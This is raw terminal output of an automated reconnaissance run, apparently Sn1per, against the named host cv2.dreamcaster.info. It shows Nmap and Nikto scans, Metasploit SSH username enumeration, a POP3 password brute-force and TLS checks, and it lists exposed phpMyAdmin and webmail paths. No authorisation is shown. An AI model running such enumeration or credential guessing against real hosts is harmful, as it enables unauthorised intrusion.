- |_ 2048 a7:8a:8f:c3:77:e7:10:4e:72:be:41:a8:9a:70:41:d7 (RSA)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 2.6.X
- OS CPE: cpe:/o:linux:linux_kernel:2.6.39
- OS details: Linux 2.6.39
- Network Distance: 10 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 111.47 ms 10.13.0.1
- 2 117.23 ms 37.187.24.252
- 3 111.49 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 120.23 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 138.00 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 121.50 ms 176.10.83.119
- 9 ...
- 10 121.27 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 195.27 seconds
- ____________
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
- [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
- [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
- [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
- [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
- [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => cv2.dreamcaster.info
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => cv2.dreamcaster.info
- [*] 80.82.69.63:22 - SSH - Checking for false positives
- [*] 80.82.69.63:22 - SSH - Starting scan
- [-] 80.82.69.63:22 - SSH - User 'admin' not found
- [-] 80.82.69.63:22 - SSH - User 'administrator' not found
- [-] 80.82.69.63:22 - SSH - User 'anonymous' not found
- [-] 80.82.69.63:22 - SSH - User 'backup' not found
- [-] 80.82.69.63:22 - SSH - User 'bee' not found
- [-] 80.82.69.63:22 - SSH - User 'ftp' not found
- [-] 80.82.69.63:22 - SSH - User 'guest' not found
- [-] 80.82.69.63:22 - SSH - User 'GUEST' not found
- [-] 80.82.69.63:22 - SSH - User 'info' not found
- [-] 80.82.69.63:22 - SSH - User 'mail' not found
- [-] 80.82.69.63:22 - SSH - User 'mailadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'msfadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'mysql' not found
- [-] 80.82.69.63:22 - SSH - User 'nobody' not found
- [-] 80.82.69.63:22 - SSH - User 'oracle' not found
- [-] 80.82.69.63:22 - SSH - User 'owaspbwa' not found
- [-] 80.82.69.63:22 - SSH - User 'postfix' not found
- [-] 80.82.69.63:22 - SSH - User 'postgres' not found
- [-] 80.82.69.63:22 - SSH - User 'private' not found
- [-] 80.82.69.63:22 - SSH - User 'proftpd' not found
- [-] 80.82.69.63:22 - SSH - User 'public' not found
- [-] 80.82.69.63:22 - SSH - User 'root' not found
- [-] 80.82.69.63:22 - SSH - User 'superadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'support' not found
- [-] 80.82.69.63:22 - SSH - User 'sys' not found
- [-] 80.82.69.63:22 - SSH - User 'system' not found
- [-] 80.82.69.63:22 - SSH - User 'systemadmin' not found
- [-] 80.82.69.63:22 - SSH - User 'systemadministrator' not found
- [-] 80.82.69.63:22 - SSH - User 'test' not found
- [-] 80.82.69.63:22 - SSH - User 'tomcat' not found
- [-] 80.82.69.63:22 - SSH - User 'user' not found
- [-] 80.82.69.63:22 - SSH - User 'webmaster' not found
- [-] 80.82.69.63:22 - SSH - User 'www-data' not found
- [-] 80.82.69.63:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [+] 80.82.69.63:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [*] cv2.dreamcaster.info:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 53 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:44 EDT
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.12s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
- |_dns-cache-snoop: 0 of 100 tested domains are cached.
- |_dns-fuzz: The server seems impervious to our assault.
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.62.rc1.el6_9.4
- Too many fingerprints match this host to give specific OS details
- Network Distance: 10 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:6
- Host script results:
- | dns-brute:
- | DNS Brute-force hostnames:
- | mail.dreamcaster.info - 80.82.69.63
- | www.dreamcaster.info - 80.82.69.63
- | ftp.dreamcaster.info - 80.82.69.63
- |_ smtp.dreamcaster.info - 80.82.69.63
- TRACEROUTE (using port 53/udp)
- HOP RTT ADDRESS
- 1 111.54 ms 10.13.0.1
- 2 ...
- 3 111.82 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 112.79 ms 10.95.33.8
- 5 120.34 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 178.85 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 121.86 ms 176.10.83.119
- 9 ...
- 10 121.93 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 613.97 seconds
- + -- --=[Port 79 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://cv2.dreamcaster.info
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- http://cv2.dreamcaster.info [200 OK] Apache[2], Country[NETHERLANDS][NL], HTTPServer[Apache/2], IP[80.82.69.63], Script[JavaScript], Title[CandyViVa - Candid Video Vault - ARCHIVE 2]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: cv2.dreamcaster.info:80
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 400 Bad Request
- Date: Sat, 30 Sep 2017 03:00:48 GMT
- Server: Apache/2
- Accept-Ranges: bytes
- Vary: Accept-Encoding,User-Agent
- Connection: close
- Content-Type: text/html
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <HTML><HEAD>
- <TITLE>400 Bad Request</TITLE>
- </HEAD><BODY>
- <H1>Bad Request</H1>
- There was an error in your request.
- <HR>
- <I>(none)</I>
- </BODY></HTML>
- HTTP/1.1 400 Bad Request
- Date: Sat, 30 Sep 2017 03:00:48 GMT
- Server: Apache/2
- Accept-Ranges: bytes
- Vary: Accept-Encoding,User-Agent
- Connection: close
- Content-Type: text/html
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <HTML><HEAD>
- <TITLE>400 Bad Request</TITLE>
- </HEAD><BODY>
- <H1>Bad Request</H1>
- There was an error in your request.
- <HR>
- <I>(none)</I>
- </BODY></HTML>
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on cv2.dreamcaster.info...
- + -- --=[Checking if X-Frame options are enabled on cv2.dreamcaster.info...
- + -- --=[Checking if X-XSS-Protection header is enabled on cv2.dreamcaster.info...
- + -- --=[Checking HTTP methods on cv2.dreamcaster.info...
- Allow: GET,POST,OPTIONS,HEAD
- + -- --=[Checking if TRACE method is enabled on cv2.dreamcaster.info...
- + -- --=[Checking for META tags on cv2.dreamcaster.info...
- <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
- + -- --=[Checking for open proxy on cv2.dreamcaster.info...
- <tr><td>To change this page, upload your website into the public_html directory</td></tr>
- <tr><td><img src="logo.png"></td></tr>
- <tr><td style="font-size: 8pt">Date Created: Wed May 13 17:45:58 2015</td></tr>
- </table>
- <br><br>
- </center>
- </body>
- </html>
- + -- --=[Enumerating software on cv2.dreamcaster.info...
- Server: Apache/2
- + -- --=[Checking if Strict-Transport-Security is enabled on cv2.dreamcaster.info...
- + -- --=[Checking for Flash cross-domain policy on cv2.dreamcaster.info...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /crossdomain.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for Silverlight cross-domain policy on cv2.dreamcaster.info...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking for HTML5 cross-origin resource sharing on cv2.dreamcaster.info...
- + -- --=[Retrieving robots.txt on cv2.dreamcaster.info...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Retrieving sitemap.xml on cv2.dreamcaster.info...
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /sitemap.xml was not found on this server.</p>
- <p>Additionally, a 404 Not Found
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- </body></html>
- + -- --=[Checking cookie attributes on cv2.dreamcaster.info...
- + -- --=[Checking for ASP.NET Detailed Errors on cv2.dreamcaster.info...
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- error was encountered while trying to use an ErrorDocument to handle the request.</p>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 80.82.69.63
- + Target Hostname: cv2.dreamcaster.info
- + Target Port: 80
- + Start Time: 2017-09-29 22:54:27 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2
- + Server leaks inodes via ETags, header found with file /, fields: 0x17a3 0x49c412f0c86c0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Apache/2 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
- + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
- + Retrieved x-powered-by header: PHP/5.3.29
- + Uncommon header 'x-ob_mode' found, with contents: 1
- + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- + Cookie SQMSESSID created without the httponly flag
- + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
- + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
- + 8463 requests: 0 error(s) and 17 item(s) reported on remote host
- + End Time: 2017-09-29 23:14:12 (GMT-4) (1185 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/cv2.dreamcaster.info-port80.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.22-3 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [29-09-2017 23:17:05]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cv2.dreamcaster.info.txt ]
- [ INFO ][ DORK ]::[ site:cv2.dreamcaster.info ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.bd ID: 012873187529719969291:yexdhbzntue ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
- [ INFO ] Not a satisfactory result was found!
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [29-09-2017 23:17:15]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cv2.dreamcaster.info.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 23:17 EDT
- Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
- Host is up (0.12s latency).
- rDNS record for 80.82.69.63: jademonitor.net
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot DirectAdmin pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 235 guesses in 196 seconds, average tps: 1.2
- |_pop3-capabilities: USER UIDL SASL(PLAIN) AUTH-RESP-CODE STLS RESP-CODES CAPA TOP PIPELINING
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (98%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), Synology DiskStation Manager 5.1 (94%), Linux 2.6.18 - 2.6.22 (94%), WatchGuard Fireware 11.8 (93%), Linux 3.10 (93%), Linux 3.4 (92%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.1 - 3.2 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 10 hops
- TRACEROUTE (using port 110/tcp)
- HOP RTT ADDRESS
- 1 111.40 ms 10.13.0.1
- 2 111.92 ms 37.187.24.252
- 3 111.69 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 120.20 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
- 6 ...
- 7 221.96 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
- 8 221.96 ms 176.10.83.119
- 9 ...
- 10 121.49 ms jademonitor.net (80.82.69.63)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 211.89 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 161 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- + -- ----------------------------=[Checking for WAF]=------------------------ -- +
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://cv2.dreamcaster.info
- ERROR:root:Site https://cv2.dreamcaster.info appears to be down
- + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
- ____ _ _ _____ _ _
- / ___| | ___ _ _ __| | ___|_ _(_) |
- | | | |/ _ \| | | |/ _` | |_ / _` | | |
- | |___| | (_) | |_| | (_| | _| (_| | | |
- \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
- v1.0.1 by m0rtem
- [23:20:49] Initializing CloudFail - the date is: 29/09/2017
- [23:20:49] Fetching initial information from: cv2.dreamcaster.info...
- [23:20:49] Server IP: 80.82.69.63
- [23:20:49] Testing if cv2.dreamcaster.info is on the Cloudflare network...
- [23:20:49] cv2.dreamcaster.info is not part of the Cloudflare network, quitting...
- + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
- https://cv2.dreamcaster.info [200 OK] Apache[2][Default], Country[NETHERLANDS][NL], HTTPServer[Apache/2], IP[80.82.69.63]
- + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- cv2.dreamcaster.info:443 => 80.82.69.63:443
- SCAN RESULTS FOR CV2.DREAMCASTER.INFO:443 - 80.82.69.63:443
- -----------------------------------------------------------
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Deflate Compression:
- OK - Compression disabled
- * Certificate - Content:
- SHA1 Fingerprint: 19ea54ceff0e77b003342b0aaa9ea481f5650116
- Common Name: localhost
- Issuer: localhost
- Serial Number: 831942CF510F668A
- Not Before: Oct 1 09:40:25 2015 GMT
- Not After: Feb 15 09:40:25 2043 GMT
- Signature Algorithm: sha1WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match cv2.dreamcaster.info
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
- Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
- Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
- Certificate Chain Received: ['localhost']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 5.62 S
- ------------------------
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server cv2.dreamcaster.info on port 443 using SNI name cv2.dreamcaster.info
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.2 112 bits DES-CBC3-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.1 112 bits DES-CBC3-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
- Accepted TLSv1.0 112 bits DES-CBC3-SHA
- SSL Certificate:
- Signature Algorithm: sha1WithRSAEncryption
- RSA Key Strength: 2048
- Subject: localhost
- Issuer: localhost
- Not valid before: Oct 1 09:40:25 2015 GMT
- Not valid after: Feb 15 09:40:25 2043 GMT
- ###########################################################
- testssl 2.9dev from https://testssl.sh/dev/
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ https://testssl.sh/bugs/
- ###########################################################
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- Start 2017-09-29 23:21:32 -->> 80.82.69.63:443 (cv2.dreamcaster.info) <<--
- rDNS (80.82.69.63): jademonitor.net.
- Service detected: HTTP
- Testing protocols via sockets except SPDY+HTTP2
- SSLv2 not offered (OK)
- SSLv3 not offered (OK)
- TLS 1 offered
- TLS 1.1 offered
- TLS 1.2 offered (OK)
- SPDY/NPN not offered
- HTTP2/ALPN not offered
- Testing ~standard cipher categories
- NULL ciphers (no encryption) not offered (OK)
- Anonymous NULL Ciphers (no authentication) not offered (OK)
- Export ciphers (w/o ADH+NULL) not offered (OK)
- LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
- Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
- Triple DES Ciphers (Medium) offered
- High encryption (AES+Camellia, no AEAD) offered (OK)
- Strong encryption (AEAD ciphers) offered (OK)
- Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
- PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
- ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
- DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
- DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
- ECDHE-RSA-AES128-GCM-SHA256
- ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
- DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
